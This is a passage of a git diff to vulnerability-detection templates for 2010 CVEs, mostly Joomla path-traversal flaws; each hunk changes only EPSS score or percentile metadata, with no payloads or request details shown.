a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0759 cwe-id: CWE-22 epss-score: 0.06371 - epss-percentile: 0.90719 + epss-percentile: 0.90718 cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index f4d1e12d22c..8a62ae95524 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0942 cwe-id: CWE-22 epss-score: 0.1146 - epss-percentile: 0.93389 + epss-percentile: 0.93384 cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index 5e7355e599a..7fa4651a1a0 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0943 cwe-id: CWE-22 epss-score: 0.14795 - epss-percentile: 0.94299 + epss-percentile: 0.94295 cpe: cpe:2.3:a:joomlart:com_jashowcase:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index bc17dfd380f..ef2858aa4c1 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0944 cwe-id: CWE-22 epss-score: 0.01386 - epss-percentile: 0.79926 + epss-percentile: 0.79917 cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index 8b1506cffda..f40af3407b4 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0972 cwe-id: CWE-22 epss-score: 0.04611 - epss-percentile: 0.88929 + epss-percentile: 0.88926 cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index 58e49c06351..2a49687cb76 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0982 cwe-id: CWE-22 epss-score: 0.19995 - epss-percentile: 0.95283 + epss-percentile: 0.95284 cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index ee35ed22a05..dc7b3377a0d 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0985 cwe-id: CWE-22 epss-score: 0.21353 - epss-percentile: 0.95515 + epss-percentile: 0.95517 cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index 53baf7a2ac8..7abc770e055 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1056 cwe-id: CWE-22 epss-score: 0.04792 - epss-percentile: 0.89165 + epss-percentile: 0.89162 cpe: cpe:2.3:a:rockettheme:com_rokdownloads:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index 1954ac5cd24..44118cae2ee 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1217 cwe-id: CWE-22 epss-score: 0.07857 - epss-percentile: 0.91741 + epss-percentile: 0.91739 cpe: cpe:2.3:a:je_form_creator:je_form_creator:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index bd80ff31c84..ef4da21254b 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1219 cwe-id: CWE-22 epss-score: 0.27216 - epss-percentile: 0.96239 + epss-percentile: 0.96241 cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index cf88ba123bb..f2498312747 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1302 cwe-id: CWE-22 epss-score: 0.13471 - epss-percentile: 0.93994 + epss-percentile: 0.9399 cpe: cpe:2.3:a:decryptweb:com_dwgraphs:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index 9aad7daa2bd..95962882d4c 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1304 cwe-id: CWE-22 epss-score: 0.03144 - epss-percentile: 0.86495 + epss-percentile: 0.86498 cpe: cpe:2.3:a:joomlamo:com_userstatus:1.21.16:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index 5474d6f70e3..e457c4aa976 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1306 cwe-id: CWE-22 epss-score: 0.05015 - epss-percentile: 0.89409 + epss-percentile: 0.89408 cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index c9db2811ebd..f0595c9916a 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1307 cwe-id: CWE-22 epss-score: 0.15744 - epss-percentile: 0.94509 + epss-percentile: 0.94507 cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index c2f9ef37ca4..a0b5e71e26f 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1308 cwe-id: CWE-22 epss-score: 0.0581 - epss-percentile: 0.90235 + epss-percentile: 0.90236 cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index 1d8fcce96ef..b5428661733 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1312 cwe-id: CWE-22 epss-score: 0.04403 - epss-percentile: 0.88665 + epss-percentile: 0.88663 cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index a825137f01b..a11e4eee456 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1313 cwe-id: CWE-22 epss-score: 0.02852 - epss-percentile: 0.85838 + epss-percentile: 0.85836 cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index 93a1c86e9e8..1ce2291c1be 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1314 cwe-id: CWE-22 epss-score: 0.01904 - epss-percentile: 0.82804 + epss-percentile: 0.82801 cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index 03382ef0c93..d0e9186d006 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1315 cwe-id: CWE-22 epss-score: 0.07172 - epss-percentile: 0.91319 + epss-percentile: 0.91317 cpe: cpe:2.3:a:joomlamo:com_weberpcustomer:1.2.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index 68ddf0d4929..c1fac8a2a4c 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1340 cwe-id: CWE-22 epss-score: 0.03958 - epss-percentile: 0.88021 + epss-percentile: 0.88024 cpe: cpe:2.3:a:joomla-research:com_jresearch:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index b8a74125152..b43d46e5796 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1353 cwe-id: CWE-22 epss-score: 0.08715 - epss-percentile: 0.9224 + epss-percentile: 0.92234 cpe: cpe:2.3:a:wowjoomla:com_loginbox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index ca6e5515a85..e84b5467576 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2010-1429 cwe-id: CWE-264 epss-score: 0.27359 - epss-percentile: 0.96256 + epss-percentile: 0.96259 cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:*:cp08:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 38fc0c9b6b9..ffab614a34c 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2010-1461 cwe-id: CWE-22 - epss-score: 0.07132 - epss-percentile: 0.91292 + epss-score: 0.19512 + epss-percentile: 0.95204 cpe: cpe:2.3:a:gogoritas:com_photobattle:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index 59e47be2dc9..427d4e636af 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1469 cwe-id: CWE-22 epss-score: 0.04635 - epss-percentile: 0.88966 + epss-percentile: 0.88963 cpe: cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index edbda61c0e7..b09dd47d101 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1471 cwe-id: CWE-22 epss-score: 0.09698 - epss-percentile: 0.92684 + epss-percentile: 0.92678 cpe: cpe:2.3:a:b-elektro:com_addressbook:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index 6ee0ed51079..d0c64c141b9 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1474 cwe-id: CWE-22 epss-score: 0.01819 - epss-percentile: 0.82421 + epss-percentile: 0.82418 cpe: cpe:2.3:a:supachai_teasakul:com_sweetykeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index 057b0f34e56..9ea239ac8e5 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1475 cwe-id: CWE-22 epss-score: 0.02403 - epss-percentile: 0.84664 + epss-percentile: 0.84662 cpe: cpe:2.3:a:ternaria:com_preventive:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 96d6a6ae688..e606bad583d 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1476 cwe-id: CWE-22 epss-score: 0.04011 - epss-percentile: 0.88126 + epss-percentile: 0.88128 cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index ff8da152d00..1379c2849f2 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1478 cwe-id: CWE-22 epss-score: 0.02405 - epss-percentile: 0.8467 + epss-percentile: 0.84668 cpe: cpe:2.3:a:ternaria:com_jfeedback:1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 4904e6525b9..4573e3b3c41 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1495 cwe-id: CWE-22 epss-score: 0.08954 - epss-percentile: 0.92347 + epss-percentile: 0.92342 cpe: cpe:2.3:a:matamko:com_matamko:1.01:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index 3e7e7b3372c..b46ae7bd601 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2010-1532 cwe-id: CWE-22 - epss-score: 0.02324 - epss-percentile: 0.84399 + epss-score: 0.14329 + epss-percentile: 0.94199 cpe: cpe:2.3:a:givesight:com_powermail:1.53:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index dbbe5eeb607..a4fdb630957 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1533 cwe-id: CWE-22 epss-score: 0.01355 - epss-percentile: 0.79722 + epss-percentile: 0.79713 cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 8726c53e685..1ee808cec6d 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1535 cwe-id: CWE-22 epss-score: 0.03656 - epss-percentile: 0.87527 + epss-percentile: 0.87529 cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index 402f604c743..81f70b75f58 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1540 cwe-id: CWE-22 epss-score: 0.19512 - epss-percentile: 0.95206 + epss-percentile: 0.95204 cpe: cpe:2.3:a:myblog:com_myblog:3.0.329:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index 03c40a94c42..b7f8ed7b9ad 100644 --- a/http/cves/2010/CVE-2010-1586.yaml +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1586 cwe-id: CWE-20 epss-score: 0.00524 - epss-percentile: 0.66343 + epss-percentile: 0.66327 cpe: cpe:2.3:a:hp:system_management_homepage:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index 91399cbe786..707e6e06cac 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1601 cwe-id: CWE-22 epss-score: 0.22371 - epss-percentile: 0.95635 + epss-percentile: 0.95639 cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 539000c797a..f3796a3783f 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1602 cwe-id: CWE-22 epss-score: 0.02161 - epss-percentile: 0.83843 + epss-percentile: 0.83837 cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index b269ddcdf9f..f79ad2501e8 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1603 cwe-id: CWE-22 epss-score: 0.06069 - epss-percentile: 0.90461 + epss-percentile: 0.90464 cpe: cpe:2.3:a:zimbllc:com_zimbcore:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index 96453f3b6b9..c40e8f62a60 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1607 cwe-id: CWE-22 epss-score: 0.02237 - epss-percentile: 0.84125 + epss-percentile: 0.84121 cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index 9611d60f878..1a677d90c07 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1657 cwe-id: CWE-22 epss-score: 0.01076 - epss-percentile: 0.77345 + epss-percentile: 0.77338 cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index afa76eeb454..d21a165f12c 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1659 cwe-id: CWE-22 epss-score: 0.0444 - epss-percentile: 0.88708 + epss-percentile: 0.88706 cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index 357fe4f6004..d4b98b6cead 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1714 cwe-id: CWE-22 epss-score: 0.07007 - epss-percentile: 0.91204 + epss-percentile: 0.91202 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_arcadegames:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index b6b66f6b80a..6591a9e9144 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1715 cwe-id: CWE-22 epss-score: 0.02135 - epss-percentile: 0.83748 + epss-percentile: 0.83741 cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index d83857f92df..75de21c279d 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1717 cwe-id: CWE-22 epss-score: 0.04997 - epss-percentile: 0.8939 + epss-percentile: 0.89389 cpe: cpe:2.3:a:if_surfalert_project:if_surfalert:1.2:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index d8f4c84125b..19fad6697db 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1718 cwe-id: CWE-22 epss-score: 0.0208 - epss-percentile: 0.83552 + epss-percentile: 0.83548 cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index 16de5d2317c..be1fb892dea 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1719 cwe-id: CWE-22 epss-score: 0.02873 - epss-percentile: 0.85884 + epss-percentile: 0.85883 cpe: cpe:2.3:a:moto-treks:com_mtfireeagle:1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index 597daa39271..e923c9ee484 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1722 cwe-id: CWE-22 epss-score: 0.01519 - epss-percentile: 0.80842 + epss-percentile: 0.80832 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_market:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index 9fca0d54068..8c25c39e465 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1723 cwe-id: CWE-22 epss-score: 0.0469 - epss-percentile: 0.89029 + epss-percentile: 0.89025 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_drawroot:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index 4f385dc6a90..1cf12b45347 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1870 cwe-id: CWE-917 epss-score: 0.9341 - epss-percentile: 0.99807 + epss-percentile: 0.99806 cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index a3236fabffc..18a13fa97f9 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1875 cwe-id: CWE-22 epss-score: 0.01575 - epss-percentile: 0.81133 + epss-percentile: 0.81124 cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index 90ddd9dc0c0..d023aa9956f 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1878 cwe-id: CWE-22 epss-score: 0.02797 - epss-percentile: 0.85694 + epss-percentile: 0.85692 cpe: cpe:2.3:a:blueflyingfish.no-ip:com_orgchart:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index fabe8ee5ebc..a9084f3e555 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1952 cwe-id: CWE-22 epss-score: 0.03339 - epss-percentile: 0.86947 + epss-percentile: 0.86949 cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index f8f5260d10a..70b99fe0525 100644 --- a/http/cves/2010/CVE-2010-1954.yaml +++ b/http/cves/2010/CVE-2010-1954.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1954 cwe-id: CWE-22 epss-score: 0.0982 - epss-percentile: 0.9274 + epss-percentile: 0.92734 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multiroot:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index a5b110fcf15..189e05793cb 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1955 cwe-id: CWE-22 epss-score: 0.02663 - epss-percentile: 0.85382 + epss-percentile: 0.85378 cpe: cpe:2.3:a:thefactory:com_blogfactory:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index e436d7d587c..930d27bcc79 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1956 cwe-id: CWE-22 epss-score: 0.05092 - epss-percentile: 0.89502 + epss-percentile: 0.895 cpe: cpe:2.3:a:thefactory:com_gadgetfactory:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index ecf97cc96fd..99f4be431c8 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1957 cwe-id: CWE-22 epss-score: 0.05954 - epss-percentile: 0.90372 + epss-percentile: 0.90374 cpe: cpe:2.3:a:thefactory:com_lovefactory:1.3.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index 2b0958c33c9..c2495aaeacf 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1977 cwe-id: CWE-22 epss-score: 0.14139 - epss-percentile: 0.94158 + epss-percentile: 0.94154 cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff 